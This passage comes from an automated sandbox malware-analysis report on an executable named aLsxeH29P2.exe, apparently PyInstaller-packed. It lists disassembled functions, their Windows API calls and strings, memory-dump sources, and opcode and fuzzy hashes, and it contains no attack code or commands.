                                                                                      • Opcode Fuzzy Hash: 08ef0bffa0d8dc861c4a01b7d2fd628c67e896dc6c26123b9582640005c51e48
                                                                                      • Instruction Fuzzy Hash: 9551A672908A8286EB64EF13D9443687790FB54BA8F944175DA8D47BE9CFBCE471CB00
                                                                                      Function 00007FFE126CB118 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: NameName::
                                                                                      • String ID: %lf
                                                                                      • API String ID: 1333004437-2891890143
                                                                                      • Opcode ID: 7e0deb2cf17bd330c849068a4ca2fc9bc064bfcc9212df10860184869afe9d43
                                                                                      • Instruction ID: fa63fe4e89f0cfee14bc6c13d23f6fb0c50392372f0e60304bdeb83fd7abc278
                                                                                      • Opcode Fuzzy Hash: 7e0deb2cf17bd330c849068a4ca2fc9bc064bfcc9212df10860184869afe9d43
                                                                                      • Instruction Fuzzy Hash: 0531E721A0CF8A86E611EB13BC501F97360FF55BA0F848276EA8E437F5EE6CE5118300
                                                                                      Function 00007FF7F3DD7E20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNEL32(00000000,?,00007FF7F3DD352C,?,00000000,00007FF7F3DD3F1B), ref: 00007FF7F3DD7F32
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectory
                                                                                      • String ID: %.*s$%s%c$\
                                                                                      • API String ID: 4241100979-1685191245
                                                                                      • Opcode ID: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                                                      • Instruction ID: 6e2740a1a2cd88549ffabce37b722be6d868710c6b2f61816188a2c2771d0717
                                                                                      • Opcode Fuzzy Hash: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                                                      • Instruction Fuzzy Hash: 5131E661619AC245EBA1AB60E4507AAF354EF84BE0F840231EE7D5F7C9DF3CD60187A0
                                                                                      Function 00007FF7F3DD2810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message
                                                                                      • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                      • API String ID: 2030045667-255084403
                                                                                      • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                      • Instruction ID: 181d5bafc080ebaf6f977990e7ba27d40273d7dfe035b4a824d94cd3314f00fa
                                                                                      • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                      • Instruction Fuzzy Hash: F521F772B08B4181E750ABA4F8807EAB364FB88780F800135EE9D6B799DF3CD245C790
                                                                                      Function 00007FFE126C2A50 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00007FFE126C6E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE126C29EE), ref: 00007FFE126C6E56
                                                                                      • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE126C2A8E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: abortterminate
                                                                                      • String ID: MOC$RCC$csm
                                                                                      • API String ID: 661698970-2671469338
                                                                                      • Opcode ID: 3ab94ae7472f91afbfb2fa40e8eaefdcfa6935c471aaf11af4776549d32657f7
                                                                                      • Instruction ID: a77f73950e9d916e38c6b61b665b6a4033627113c02cbe5c63ee2de6f65965b2
                                                                                      • Opcode Fuzzy Hash: 3ab94ae7472f91afbfb2fa40e8eaefdcfa6935c471aaf11af4776549d32657f7
                                                                                      • Instruction Fuzzy Hash: 3FF04432918A07C5E7647BA2E98107D3664EF8C764F9550B1DB4C062E1CFBCE8B0CB41
                                                                                      Function 00007FF7F3DEC5A0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                      • String ID:
                                                                                      • API String ID: 2718003287-0
                                                                                      • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                      • Instruction ID: 775f15d9a27788961b64ada9be7e35c628ec14bbc8d5159decfb8c744f359ed0
                                                                                      • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                      • Instruction Fuzzy Hash: F5D13772B08A418AE754DFB5D4402AC7BB1FB547D8B804236DE6DABBC9DE38D046C390
                                                                                      Function 00007FF7F3DECF60 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F3DECF4B), ref: 00007FF7F3DED07C
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F3DECF4B), ref: 00007FF7F3DED107
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConsoleErrorLastMode
                                                                                      • String ID:
                                                                                      • API String ID: 953036326-0
                                                                                      • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                      • Instruction ID: 5d4a17a707d31ee137a09be358ea6f9a4a5ced167c832bacbbe15f653786dc87
                                                                                      • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                      • Instruction Fuzzy Hash: 7591C832E1865189F794AFA5944027DBFA0BB44B88F944239DE2E7B6C4CF38D486C771
                                                                                      Function 00007FFE126CA638 Relevance: 6.2, APIs: 4, Instructions: 193COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Name::operator+
                                                                                      • String ID:
                                                                                      • API String ID: 2943138195-0
                                                                                      • Opcode ID: cc076bc81e8f2d48ba6aefa04368e4e4f2bc5c7ef048a26b3748b4f62f7846b0
                                                                                      • Instruction ID: 58df4238998d833a67a62b84ff6161f19082bd5e29a7d5afd04938108d32c554
                                                                                      • Opcode Fuzzy Hash: cc076bc81e8f2d48ba6aefa04368e4e4f2bc5c7ef048a26b3748b4f62f7846b0
                                                                                      • Instruction Fuzzy Hash: CF918E22E08E568AFB11AFA2DC543BC37B0BB04728F9540B5DA4D176E5DFBCA856C340
                                                                                      Function 00007FF7F3DEF98C Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _get_daylight$_isindst
                                                                                      • String ID:
                                                                                      • API String ID: 4170891091-0
                                                                                      • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                      • Instruction ID: 5944f08a2ce7b60b00be7a8ce2f2eea3813531f22c2b260dae450e9a6408ce92
                                                                                      • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                      • Instruction Fuzzy Hash: 19515A72F0461186FB58EFA489512BCBB69BF40358F910335DD3E6AAE4DF38A442C790
                                                                                      Function 00007FF7F3DE577C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                      • String ID:
                                                                                      • API String ID: 2780335769-0
                                                                                      • Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                      • Instruction ID: 6e00a30a326d8c7af9a40158f2af195df77ab4b489ee80222aa1e68177a140d6
                                                                                      • Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                      • Instruction Fuzzy Hash: 8751B562E0464986F794EFB0D4903BD7BA2AB48B98F504634DE1D6F7C9DF38D48083A1
                                                                                      Function 00007FFE126CD274 Relevance: 6.1, APIs: 4, Instructions: 87COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Name::operator+$Replicator::operator[]
                                                                                      • String ID:
                                                                                      • API String ID: 3863519203-0
                                                                                      • Opcode ID: 57265f9aaea93611d8ae4b0edf9f43af56394ecd72ecd9aef4b3b93798ee479d
                                                                                      • Instruction ID: 5b255d9fe7c8c01acc88596d5ba646c5375727552f437b2e603ffe475e38597f
                                                                                      • Opcode Fuzzy Hash: 57265f9aaea93611d8ae4b0edf9f43af56394ecd72ecd9aef4b3b93798ee479d
                                                                                      • Instruction Fuzzy Hash: 17418772A08B8589EB01DFA6DC403AC37A0FB59B68F948075CA8C577A9DFBCD451C350
                                                                                      Function 00007FF7F3DDD010 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                      • String ID:
                                                                                      • API String ID: 2933794660-0
                                                                                      • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                      • Instruction ID: 8f1adda0f54d874580e69400943d2f0805d526555979edf3dc9f5d6e720c79c3
                                                                                      • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                      • Instruction Fuzzy Hash: FD118F22B14F0589EB409B70E8442B873A0FB48718F440E31DE7D5A7A4DF38D1548390
                                                                                      Function 00007FFE126D09FC Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                      • String ID:
                                                                                      • API String ID: 2933794660-0
                                                                                      • Opcode ID: 74344bb322e65ea4bb1ed5ded81f371800f489492d84809563666ba838173471
                                                                                      • Instruction ID: cf9270728fd90f8415c24b51d9e20ec016e423ea9cc7f9961a336c301c346810
                                                                                      • Opcode Fuzzy Hash: 74344bb322e65ea4bb1ed5ded81f371800f489492d84809563666ba838173471
                                                                                      • Instruction Fuzzy Hash: EA113022B14F498AEB00CF61EC542B833A4FB59768F840E31DAAD467A4DFBCD1698340
                                                                                      Function 00007FFE126CF670 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentImageNonwritableUnwind
                                                                                      • String ID: csm
                                                                                      • API String ID: 451473138-1018135373
                                                                                      • Opcode ID: 88d75f8372be57577a220e465c4aa8d65e851ebfefcdd899ecde71752cd89d28
                                                                                      • Instruction ID: e5c2e8b48e27b2ad6a54794ce335214e4db24cc07864160f87f4506544986025
                                                                                      • Opcode Fuzzy Hash: 88d75f8372be57577a220e465c4aa8d65e851ebfefcdd899ecde71752cd89d28
                                                                                      • Instruction Fuzzy Hash: BF51C631B1AA018BEB14EB17E84467C37A1EB44BA4F918176DA5D437E8DFBCE461C700
                                                                                      Function 00007FF7F3DF5B1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                      • String ID: ?
                                                                                      • API String ID: 1286766494-1684325040
                                                                                      • Opcode ID: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                                                      • Instruction ID: e631e8a3715736c6f5d76e77ee77043f82bce6492aff23112b9f03a0e201ed71
                                                                                      • Opcode Fuzzy Hash: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                                                      • Instruction Fuzzy Hash: 7F416C12A0828641FBA5ABB5E48137AE752EB80BA4F944234EE7D1FBDDDF3CD4418750
                                                                                      Function 00007FFE126C4E40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: abort$CreateFrameInfo
                                                                                      • String ID: csm
                                                                                      • API String ID: 2697087660-1018135373
                                                                                      • Opcode ID: a8b8ee24cb783e7d293a6e1db454b28b1bfc46eb23a73e5049af87221528bbc6
                                                                                      • Instruction ID: c1a687b03b5cad8fc8c10cc0231ef1d31a8ab48e757fcd427d423b5c74aeb214
                                                                                      • Opcode Fuzzy Hash: a8b8ee24cb783e7d293a6e1db454b28b1bfc46eb23a73e5049af87221528bbc6
                                                                                      • Instruction Fuzzy Hash: 98514173618B4187D620EB26E84026E77A4F789BA0F540175DB8D47BA5CF7CE461CB40
                                                                                      Function 00007FF7F3DE9014 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F3DE9046
                                                                                        • Part of subcall function 00007FF7F3DEA948: HeapFree.KERNEL32(?,?,?,00007FF7F3DF2D22,?,?,?,00007FF7F3DF2D5F,?,?,00000000,00007FF7F3DF3225,?,?,?,00007FF7F3DF3157), ref: 00007FF7F3DEA95E
                                                                                        • Part of subcall function 00007FF7F3DEA948: GetLastError.KERNEL32(?,?,?,00007FF7F3DF2D22,?,?,?,00007FF7F3DF2D5F,?,?,00000000,00007FF7F3DF3225,?,?,?,00007FF7F3DF3157), ref: 00007FF7F3DEA968
                                                                                      • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7F3DDCBA5), ref: 00007FF7F3DE9064
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                      • String ID: C:\Users\user\Desktop\aLsxeH29P2.exe
                                                                                      • API String ID: 3580290477-2540427151
                                                                                      • Opcode ID: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
                                                                                      • Instruction ID: 27b25f9dbd441c33745a9c0feb227a98c74d311c106aa003961c805ad241f776
                                                                                      • Opcode Fuzzy Hash: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
                                                                                      • Instruction Fuzzy Hash: C341A336A0970285EB98FF61D8400BDABA4EF447D4BC54135E95E6BBC5CE3CD4C583A1
                                                                                      Function 00007FF7F3DECC38 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
